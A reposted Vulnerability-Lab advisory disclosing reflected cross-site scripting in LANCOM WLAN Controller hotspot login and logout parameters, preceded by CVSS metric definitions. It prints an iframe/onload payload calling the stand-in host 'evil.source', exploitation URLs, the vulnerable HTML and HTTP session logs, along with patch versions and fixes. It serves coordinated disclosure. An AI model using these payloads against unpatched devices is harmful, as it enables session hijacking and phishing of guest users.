The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: LANCOM WLAN Controller Cross Site Scripting
Document Title:
===============
LANCOM WLAN Controller - Multiple Cross Site Scripting Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2196
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2020/04/30/vulnerability-lancom-systems-wireless-controller-series-uncovered
Release Date:
=============
2020-05-07
Vulnerability Laboratory ID (VL-ID):
====================================
2196
Common Vulnerability Scoring System:
====================================
4.7
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
1.000 - 2.000
Product & Service Introduction:
===============================
Die LANCOM Public Spot Option ermglicht die Bereitstellung eines
zuverlssigen und sicheren Zugangs fr Gste, Besucher,
Partner oder Kunden ber nur eine Infrastruktur. Dabei bleiben Haus- und
Gastnetz stets sicher voneinander getrennt.
Ohne das Netzwerk um zustzliche Hardware-Komponenten zu erweitern,
erhalten Sie mit der LANCOM Public Spot Option
die optimale Lsung fr die Einrichtung sicherer Hotspots.
(Copy of the Homepage:
https://www.lancom-systems.de/produkte/software-optionen/lancom-public-spot/
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
non-persistent cross site scripting vulnerabilities in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.
Affected Product(s):
====================
LANCOM Systems
Product: WLAN Controller WLC-1000 & WLC-4006 ...
Firmware: LCOS 10.12 SU14, 10.20 SU9 & 10.32 RU8
Vulnerability Disclosure Timeline:
==================================
2020-03-20: Researcher Notification & Coordination (Security Researcher)
2020-04-14: Vendor Notification (Security Department)
2020-04-15: Vendor Response/Feedback (Security Department)
2020-04-20: Vendor Fix/Patch (Service Developer Team)
2020-05-07: Security Acknowledgements (Security Department)
2020-05-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple cross site scripting web vulnerabilities has been discovered in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise
browser to web-application requests from the client-side. The product is
publicly certified by the BSI in germany and owns a
security policy against backdoors.
The cross site scripting vulnerabilities are located in the `userid` and
`password` parameters of the `/authen/start/` (login/logout) module.
Unauthenticated attackers can connect to the guest wifi (ibd gast) with
the web ui logon mask to inject own malicious non-persistent script
codes for client-side manipulations into the login and password input
fields. The execution can as well be triggered with a simple logout GET
method request via refresh parameter. The request method to inject the
malicious script code is POST and the attack vector of the vulnerability
is non-persistent on client-side.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is POST/GET. The vulnerabilities are classic client-side
cross
site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, non-persistent phishing
attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.
Request Method(s):
[+] POST / GET
Vulnerable Module(s):
[+] /authen/start/
[+] /logout/
Function(s):
[+] refresh
Vulnerable Parameter(s):
[+] Userid
[+] Password
Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers with guest
authentication and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser
2. Tamper the http session protocol
2. Start a Wifi Scan
2. Identify the public guest hotspot of lancom
3. Connect to it with guest permissions without credentials
4. Interact by openening the web ui on login.com were you can connect
with the correct wifi access credentials
5. Inject the payload in the userid and password input fields of the
wifi hotspot login form and submit via post method
6. The injected script code directly executes near to the input field
were the content is insecure transmitted
7. Successful reproduce of the cross site scripting web vulnerability!
PoC: Payload
test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
PoC: Exploitation
http://www.login.com/authen/start/?refreshhost=192.168.20.13737&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
http://logout/authen/start/?refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
Vulnerable Source:
<div id="contentDiv">
<h2>Login</h2>
<form method="POST" name="myForm" action="http://logout:80/authen/login/">
<div><input type="hidden" name="refreshdir" value=""></div>
<div><input type="hidden" name="refreshhost" value="192.168.20.137"></div>
<div><input type="hidden" name="refreshssl" value="0"></div>
<input style="color:#000000" id="userid" name="userid" type="text"
size="24" maxlength="64" value="a"><iframe src="[evil.source]/"></iframe>"
onfocus="if(this.value && this.value == this.defaultValue) {
this.value=''; if(document.all) {this.createTextRange().select(); }
this.style.color='#000000'; }" onblur="if(this.value == '') {
this.value='a""><iframe src="[evil.source]/"></iframe>';
this.style.color='#000000'; }"/><br>
<input id="password" name="password" type="text" size="24"
maxlength="64" value="Your password" onfocus="if(this.value &&
this.value == this.defaultValue) { this.value=''; if(document.all)
{this.createTextRange().select(); }
document.getElementById('showPassword').checked ?
this.type='text' : this.type='password'; this.style.color='#000000'; }"
onblur="if(this.value == '') { this.value='Your password';
this.type='text'; this.style.color='#ccc'; }">
<div style="padding-bottom:0px;">
<input id="showPassword" name="showPassword" type="checkbox"
onchange="if(document.getElementById('password').value &&
document.getElementById('password').value
!= document.getElementById('password').defaultValue) { this.checked ?
document.getElementById('password').type='text' :
document.getElementById('password').type='password' }"><span
id="showPasswordText">Show password</span>
</div>
--- [PoC Session Logs] --- (Login)
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: max-age=3600, must-revalidate
Content-Type: image/svg+xml
Content-Length: 9362
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Content-Security-Policy: default-src 'self' 'unsafe-inline'; script-src
'self' 'unsafe-inline' 'unsafe-eval'; connect-src *
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none';
camera 'none'; magnetometer 'none'; gyroscope 'none'; speaker 'none';
vibrate 'none'; fullscreen 'self'; payment 'none'
Content-Encoding: gzip
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: LANCOM
--- [PoC Session Logs] (POST) --- (Logout)
http://logout/authen/login/
Host: logout
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: null
Connection: keep-alive
Upgrade-Insecure-Requests: 1
refreshdir=&userid=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>&password=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
-
POST: HTTP/1.1 200 OK
Connection: Close
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none'; camera 'none';
magnetometer
'none'; gyroscope 'none'; speaker 'none'; vibrate 'none'; fullscreen
'self'; payment 'none'
Content-Encoding: gzip
Reference(s):
http://logout/
http://logout/authen/
http://logout/authen/login/
http://www.login.com/
http://www.login.com/images/
http://www.login.com/authen/
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by following the steps ...
1. Parse the content of the username and password input field to prevent
the injection point
2. Restrict the input field by disallowing the usage of specific special
chars for the name and password variables
3. Secure the output location were the content is insecure sanitized
delivered as output result
Solution of Manufacturer:
https://www.lancom-systems.de/service-support/soforthilfe/allgemeine-sicherheitshinweise/
https://www.lancom-systems.com/service-support/instant-help/general-security-information/
The vulnerabilities are resolved in the following versions ... LCOS
10.12 SU15, 10.20 SU10 & 10.32 RU9.
We recommend all product customers to update the lcos as soon as
possible to prevent attacks by criminals.
Security Risk:
==============
The security risk of the non-persistent cross site scripting
vulnerability in the login form of the wifi hotspot application is
estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.comwww.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum